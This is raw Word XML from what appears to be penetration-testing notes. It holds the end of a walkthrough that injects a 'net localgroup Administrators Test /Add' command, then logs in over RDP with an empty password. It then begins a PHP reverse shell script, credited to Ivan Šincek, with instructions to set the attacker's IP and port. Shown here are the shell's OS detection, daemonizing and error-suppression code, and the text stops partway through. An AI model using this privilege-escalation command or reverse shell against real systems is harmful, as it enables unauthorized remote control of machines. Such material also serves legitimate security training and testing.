      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005D5190" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">| net </w:t>
      </w:r>
      <w:r w:rsidR="005D5190" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D5190" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="92D050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Administrators</w:t>
      </w:r>
      <w:r w:rsidR="005D5190" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test </w:t>
      </w:r>
      <w:r w:rsidR="005D5190" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>/Add</w:t>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005D5190" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(May grant a local user account on the machine administrator privileges)</w:t>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>&gt; From this point it may be possible to log into the machine using RDP.</w:t>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>1&gt; Open Remote Desktop Connection (can be found using the search icon) and type in the target system IP address.</w:t>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2&gt; In the ‘General’ tab, enter the username </w:t>
      </w:r>
      <w:r w:rsidR="005D5190" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Test </w:t>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>and click connect.</w:t>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>3&gt; Leave the password field empty when prompted.</w:t>
      </w:r>
      <w:r w:rsidR="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D32D37">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>4&gt; Say ‘yes’ to any questions regarding certificates.</w:t>
      </w:r>
      <w:r w:rsidR="00C831BD" w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D6BAE" w14:textId="27D1C731" w:rsidR="00311DC9" w:rsidRPr="00311DC9" w:rsidRDefault="003F5A14"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F5A14">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scripts and Information:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5A14">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHP Reverse Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00311DC9" w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C8E2D4" w14:textId="3DB698A3"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Copyright (c) 2020 Ivan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Šincek</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> [PHP Reverse Shell]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Change IP and port, see </w:t>
      </w:r>
      <w:r w:rsidR="00834B5C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>last page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB2B91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v2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F731AD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Requires PHP v5.0.0 or greater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD99D7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Works on Linux OS, macOS, and Windows OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507BE07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See the original script at https://github.com/pentestmonkey/php-reverse-shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FDCA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class Shell {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A1945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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC4AFF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$port  = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A0435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$os    = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4456E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$shell = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC747F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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>descriptorspec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271FC8F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0 =&gt; array('pipe', 'r'), // shell can read from STDIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E3CB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1 =&gt; array('pipe', 'w'), // shell can write to STDOUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651B47A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2 =&gt; array('pipe', 'w')  // shell can write to STDERR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298234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018E970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$buffer  = 1024;    // read/write buffer size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564432B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$clen    = 0;       // command length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A948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$error   = false;   // stream read/write error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00387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public function __construct($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, $port) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3282DCA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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6158186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$this-&gt;port = $port;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAD45E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15F1C3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detect() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C9278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$detected = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FECBA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stripos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(PHP_OS, 'LINUX') !== false) { // same for macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6819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$this-&gt;os    = 'LINUX';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6435FD6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$this-&gt;shell = '/bin/sh';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647555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stripos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">(PHP_OS, 'WIN32') !== false || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>stripos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">(PHP_OS, 'WINNT') !== false || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>stripos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(PHP_OS, 'WINDOWS') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A1231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$this-&gt;os    = 'WINDOWS';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CD518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$this-&gt;shell = 'cmd.exe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BD65D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF97D2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$detected = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A42AE3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"SYS_ERROR: Underlying operating system is not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>supported,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> script will now exit...\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B22292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4892A23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return $detected;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C656C3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9F59D8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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>daemonize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA9F1B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$exit = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AA6B2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function_exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>pcntl_fork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDE364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"DAEMONIZE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>pcntl_fork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">() does not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>exists</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, moving on...\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D5EE1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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = @pcntl_fork()) &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C5C4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"DAEMONIZE: Cannot fork off the parent process, moving on...\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080BBFF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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CF5F5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$exit = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89377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"DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E21A62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posix_setsid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>() &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0CCF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once </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>daemonized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> you will actually no longer see the script's dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2DCB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"DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4309536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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D1A63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"DAEMONIZE: Completed successfully!\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2088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A6E3BF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return $exit;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FF8EE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4193C4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settings() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272986B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@error_reporting(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F230DE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@set_time_limit(0); // do not impose the script execution time limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED9197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@umask(0); // set the file/directory permissions - 666 for files and 777 for directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B25C5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A8E6B4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dump($data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B6303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$data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>str_replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>('&lt;', '&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
